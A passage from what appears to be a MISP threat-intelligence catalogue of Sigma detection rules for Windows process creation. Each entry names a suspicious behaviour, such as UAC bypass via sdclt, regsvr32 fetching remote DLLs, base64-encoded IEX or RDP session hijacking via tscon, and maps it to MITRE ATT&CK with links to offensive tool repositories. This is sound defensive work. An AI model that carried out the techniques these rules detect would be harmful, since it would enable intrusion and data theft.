https://www.virusradar.com/en/Win32_Kasidet.AD/description

https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml

HackTool - PurpleSharp Execution

Detects the execution of the PurpleSharp adversary simulation tool

The tag is: misp-galaxy:sigma-rules="HackTool - PurpleSharp Execution"

HackTool - PurpleSharp Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"

Table 10960. Table References

Links

https://github.com/mvelazc0/PurpleSharp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml

Suspicious MSHTA Child Process

Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution

The tag is: misp-galaxy:sigma-rules="Suspicious MSHTA Child Process"

Suspicious MSHTA Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 10962. Table References

Links

https://www.trustedsec.com/july-2015/malicious-htas/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml

PUA - CleanWipe Execution

Detects the use of CleanWipe, a tool usually used to remove Symantec antivirus products.

The tag is: misp-galaxy:sigma-rules="PUA - CleanWipe Execution"

PUA - CleanWipe Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10963. Table References

Links

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml

Suspicious Child Process Of Veeam Dabatase

Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of Veeam Dabatase"

Table 10964. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml

Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database.

The tag is: misp-galaxy:sigma-rules="Active Directory Database Snapshot Via ADExplorer"

Active Directory Database Snapshot Via ADExplorer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10965. Table References

Links

https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml

Suspicious Rundll32 Execution With Image Extension

Detects the execution of Rundll32.exe with DLL files masquerading as image files

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Execution With Image Extension"

Suspicious Rundll32 Execution With Image Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10966. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml

Potential UAC Bypass Via Sdclt.EXE

A general detection for sdclt.exe being spawned as an elevated process, which could indicate that sdclt.exe is being used in a UAC bypass technique.

The tag is: misp-galaxy:sigma-rules="Potential UAC Bypass Via Sdclt.EXE"

Potential UAC Bypass Via Sdclt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10967. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md

https://github.com/OTRF/detection-hackathon-apt29/issues/6

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml

Compress Data and Lock With Password for Exfiltration With 7-ZIP

An adversary may compress or encrypt collected data prior to exfiltration using third-party utilities.

The tag is: misp-galaxy:sigma-rules="Compress Data and Lock With Password for Exfiltration With 7-ZIP"

Compress Data and Lock With Password for Exfiltration With 7-ZIP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10968. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml

New Network Trace Capture Started Via Netsh.EXE

Detects the execution of netsh with the "trace" flag in order to start a network capture

The tag is: misp-galaxy:sigma-rules="New Network Trace Capture Started Via Netsh.EXE"

New Network Trace Capture Started Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10969. Table References

Links

https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/

https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml

Winrar Execution in Non-Standard Folder

Detects a suspicious WinRAR execution from a folder that is not the default installation folder.

The tag is: misp-galaxy:sigma-rules="Winrar Execution in Non-Standard Folder"

Winrar Execution in Non-Standard Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10970. Table References

Links

https://twitter.com/cyb3rops/status/1460978167628406785

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml

Suspicious Child Process Of Wermgr.EXE

Detects suspicious child processes of the Windows Error Reporting manager (wermgr.exe).

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of Wermgr.EXE"

Suspicious Child Process Of Wermgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10971. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://www.echotrail.io/insights/search/wermgr.exe

https://github.com/binderlabs/DirCreate2System

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml

Suspicious PowerShell Invocations - Specific - ProcessCreation

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Specific - ProcessCreation"

Table 10972. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml

Potential Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

The tag is: misp-galaxy:sigma-rules="Potential Amazon SSM Agent Hijacking"

Potential Amazon SSM Agent Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10973. Table References

Links

https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/

https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/

https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml

Potential Suspicious Windows Feature Enabled - ProcCreation

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature", which acts as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Windows Feature Enabled - ProcCreation"

Table 10974. Table References

Links

https://learn.microsoft.com/en-us/windows/wsl/install-on-server

https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps

https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml

Potential Cookies Session Hijacking

Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.

The tag is: misp-galaxy:sigma-rules="Potential Cookies Session Hijacking"

Table 10975. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml

Suspicious Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn’t contain a ".dll" extension. This is often used as a defense evasion method.

The tag is: misp-galaxy:sigma-rules="Suspicious Driver/DLL Installation Via Odbcconf.EXE"

Suspicious Driver/DLL Installation Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10976. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml

Potentially Suspicious Call To Win32_NTEventlogFile Class

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Call To Win32_NTEventlogFile Class"

Table 10977. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml

Invoke-Obfuscation Via Use Clip

Detects obfuscated PowerShell that uses Clip.exe in scripts (Invoke-Obfuscation style).

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip"

Invoke-Obfuscation Via Use Clip has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10978. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml

SQL Client Tools PowerShell Session Detection

This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of those logs.

The tag is: misp-galaxy:sigma-rules="SQL Client Tools PowerShell Session Detection"

SQL Client Tools PowerShell Session Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10979. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml

https://twitter.com/pabraeken/status/993298228840992768

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml

Filter Driver Unloaded Via Fltmc.EXE

Detects filter driver unloading activity via fltmc.exe.

The tag is: misp-galaxy:sigma-rules="Filter Driver Unloaded Via Fltmc.EXE"

Filter Driver Unloaded Via Fltmc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10980. Table References

Links

https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml

PowerShell Base64 Encoded IEX Cmdlet

Detects usage of a base64 encoded "IEX" cmdlet in a process command line

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded IEX Cmdlet"

PowerShell Base64 Encoded IEX Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10981. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml

Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.

The tag is: misp-galaxy:sigma-rules="Driver/DLL Installation Via Odbcconf.EXE"

Driver/DLL Installation Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10982. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml

Audio Capture via SoundRecorder

Detects an attacker collecting audio via the SoundRecorder application.

The tag is: misp-galaxy:sigma-rules="Audio Capture via SoundRecorder"

Audio Capture via SoundRecorder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 10983. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml

Remote Access Tool - NetSupport Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - NetSupport Execution"

Remote Access Tool - NetSupport Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10984. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml

Malicious PowerShell Commandlets - ProcessCreation

Detects Commandlet names from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Commandlets - ProcessCreation"

Malicious PowerShell Commandlets - ProcessCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10985. Table References

Links

https://github.com/adrecon/AzureADRecon

https://github.com/besimorhino/powercat

https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1

https://github.com/calebstewart/CVE-2021-1675

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/samratashok/nishang

https://github.com/Kevin-Robertson/Powermad

https://github.com/HarmJ0y/DAMP

https://github.com/adrecon/ADRecon

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml

Suspicious Extexport Execution

Extexport.exe loads a DLL and is executed from a folder other than its original path.

The tag is: misp-galaxy:sigma-rules="Suspicious Extexport Execution"

Suspicious Extexport Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10986. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extexport/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml

Msiexec Quiet Installation

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).

The tag is: misp-galaxy:sigma-rules="Msiexec Quiet Installation"

Msiexec Quiet Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10987. Table References

Links

https://twitter.com/st0pp3r/status/1583914244344799235

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml

Suspicious RDP Redirect Using TSCON

Detects a suspicious RDP session redirect using tscon.exe

The tag is: misp-galaxy:sigma-rules="Suspicious RDP Redirect Using TSCON"

Suspicious RDP Redirect Using TSCON has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10988. Table References

Links

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml

PUA - Adidnsdump Execution

This tool enables enumeration and exporting of all DNS records in the zone for reconnaissance of internal networks. Python 3 and python.exe must be installed. Used to query/modify DNS records for Active Directory integrated DNS via LDAP.

The tag is: misp-galaxy:sigma-rules="PUA - Adidnsdump Execution"

PUA - Adidnsdump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 10989. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml

PowerShell Base64 Encoded Reflective Assembly Load

Detects base64 encoded .NET reflective loading of Assembly

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded Reflective Assembly Load"

PowerShell Base64 Encoded Reflective Assembly Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"

Table 10990. Table References

Links

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml

Read Contents From Stdin Via Cmd.EXE

Detect the use of "<" to read and potentially execute a file via cmd.exe

The tag is: misp-galaxy:sigma-rules="Read Contents From Stdin Via Cmd.EXE"

Read Contents From Stdin Via Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10991. Table References

Links

https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml

Renamed Whoami Execution

Detects the execution of whoami that has been renamed to a different name to avoid detection

The tag is: misp-galaxy:sigma-rules="Renamed Whoami Execution"

Renamed Whoami Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10992. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml

Visual Studio Code Tunnel Shell Execution

Detects the execution of a shell (powershell, bash, wsl…) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Shell Execution"

Visual Studio Code Tunnel Shell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10993. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml

Rebuild Performance Counter Values Via Lodctr.EXE

Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.

The tag is: misp-galaxy:sigma-rules="Rebuild Performance Counter Values Via Lodctr.EXE"

Table 10994. Table References

Links

https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml

Network Reconnaissance Activity

Detects a set of suspicious network related commands often used in recon stages

The tag is: misp-galaxy:sigma-rules="Network Reconnaissance Activity"

Network Reconnaissance Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10995. Table References

Links

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml

Rundll32 UNC Path Execution

Detects rundll32 execution where the DLL is located on a remote location (share)

The tag is: misp-galaxy:sigma-rules="Rundll32 UNC Path Execution"

Rundll32 UNC Path Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10996. Table References

Links

https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml

Suspicious Add Scheduled Task Parent

Detects suspicious scheduled task creations from a parent stored in a temporary folder

The tag is: misp-galaxy:sigma-rules="Suspicious Add Scheduled Task Parent"

Suspicious Add Scheduled Task Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10997. Table References

Links

https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_parent.yml

Potentially Suspicious Regsvr32 HTTP/FTP Pattern

Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Regsvr32 HTTP/FTP Pattern"

Potentially Suspicious Regsvr32 HTTP/FTP Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10998. Table References

Links

https://twitter.com/tccontre18/status/1480950986650832903

https://twitter.com/mrd0x/status/1461041276514623491

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml

HackTool - SharpUp PrivEsc Tool Execution

Detects the use of SharpUp, a tool for local privilege escalation

The tag is: misp-galaxy:sigma-rules="HackTool - SharpUp PrivEsc Tool Execution"

HackTool - SharpUp PrivEsc Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005" with estimative-language:likelihood-probability="almost-certain"

Table 11000. Table References

Links

https://github.com/GhostPack/SharpUp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml

Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE

Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share

The tag is: misp-galaxy:sigma-rules="Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE"

Table 11001. Table References

Links

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml

Screen Capture Activity Via Psr.EXE

Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.

The tag is: misp-galaxy:sigma-rules="Screen Capture Activity Via Psr.EXE"

Screen Capture Activity Via Psr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11002. Table References

Links

https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://lolbas-project.github.io/lolbas/Binaries/Psr/

